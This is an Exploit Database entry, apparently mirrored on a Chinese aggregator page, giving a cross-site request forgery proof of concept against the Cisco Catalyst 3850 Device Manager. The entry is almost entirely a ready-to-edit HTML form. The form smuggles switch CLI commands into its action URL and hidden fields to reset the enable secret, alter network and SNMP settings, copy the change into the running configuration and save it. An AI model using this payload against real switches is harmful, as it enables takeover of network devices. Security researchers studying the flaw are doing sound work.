Cisco Catalyst 3850 Series Device Manager – Cross-Site Request Forgery

• Exploit Database
• 20 阅读

• 作者： Alperen Soydan
  日期： 2019-08-01
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/47203/

• # Product : Catalyst 3850 Series Device Manager
  # Version : 3.6.10E
  # Date: 01.08.2019
  # Vendor Homepage: https://www.cisco.com
  # Exploit Author: Alperen Soydan
  # Description : The application interface allows users to perform certain
  actions via HTTP requests without performing any validity checks to verify
  the requests. This can be exploited to perform certain actions with
  administrative privileges if a logged-in user visits a malicious web site.
  @special thx:Haki Bülent Sever
  # Tested On : Win10 & KaliLinux
  
  
  Change Switch Password CSRF @Catalyst 3850 Series Device Manager
  note : You must edit the values written by "place"
  ___________________________________________________________
  
  <html>
  <body>
  <form
  action="http://IP/%24moreField%20%0A%24a%20%24b1%0A%24c1%0A%24c2%0Awrite%20memory%0A"
  method="POST">
  <input type="hidden" name="SNMP_STATUS" value="SNMP+agent+enabled%0D%0A" />
  <input type="hidden" name="send" value="nsback.htm" />
  <input type="hidden" name="SNMP_READCOMM_DEFVAL" value="ELVIS" />
  <input type="hidden" name="SNMP_CONTACT_DEFVAL" value="Network+Support+Group" />
  <input type="hidden" name="SNMP_LOCATION_DEFVAL" value="TEST2" />
  <input type="hidden" name="text_ipAddress0" value="place first octet" />
  <input type="hidden" name="text_ipAddress1" value="place second octet" />
  <input type="hidden" name="text_ipAddress2" value="place third octet" />
  <input type="hidden" name="text_ipAddress3" value="place fourth octet" />
  <input type="hidden" name="list_subnetMask" value="place subnet mask ip" />
  <input type="hidden" name="text_ipDefaultGateway0" value="place gw ip first octet" />
  <input type="hidden" name="text_ipDefaultGateway1" value="place gw ip second octet" />
  <input type="hidden" name="text_ipDefaultGateway2" value="place gw ip third octet" />
  <input type="hidden" name="text_ipDefaultGateway3" value="palce gw ip fourth octet" />
  <input type="hidden" name="text_enableSecret" value="KEY" />
  <input type="hidden" name="text_confirmEnableSecret" value="KEY" />
  <input type="hidden" name="text_sysName" value="SW_TEST" />
  <input type="hidden" name="list_date" value="19" />
  <input type="hidden" name="list_month" value="Jul" />
  <input type="hidden" name="list_year" value="2019" />
  <input type="hidden" name="list_hour" value="10" />
  <input type="hidden" name="list_minute" value="20" />
  <input type="hidden" name="list_period" value="AM" />
  <input type="hidden" name="list_timezone" value="C" />
  <input type="hidden" name="radio_telnetAccess" value="disable" />
  <input type="hidden" name="radio_snmpStatus" value="enable" />
  <input type="hidden" name="text_snmpReadComm" value="ELVIS" />
  <input type="hidden" name="text_sysContact" value="Network+Support+Group" />
  <input type="hidden" name="text_sysLocation" value="TEST2" />
  <input type="hidden" name="list_ipv6_interface" value="Vlan500" />
  <input type="hidden" name="list_prefix" value="64" />
  <input type="hidden" name="moreField" value="more flash:/html/more.txt" />
  <input type="hidden" name="a" value="cluster pref file e.cli" />
  <input type="hidden" name="z" value="cluster pref file append e.cli" />
  <input type="hidden" name="b1" value="!enable secret KEY!ip http authentication enable!end" />
  <input type="hidden" name="c1" value="copy e.cli running-config" />
  <input type="hidden" name="c2" value="delete /force e.cli" />
  <input type="submit" value="submit form" />
  </form>
  </body>
  </html>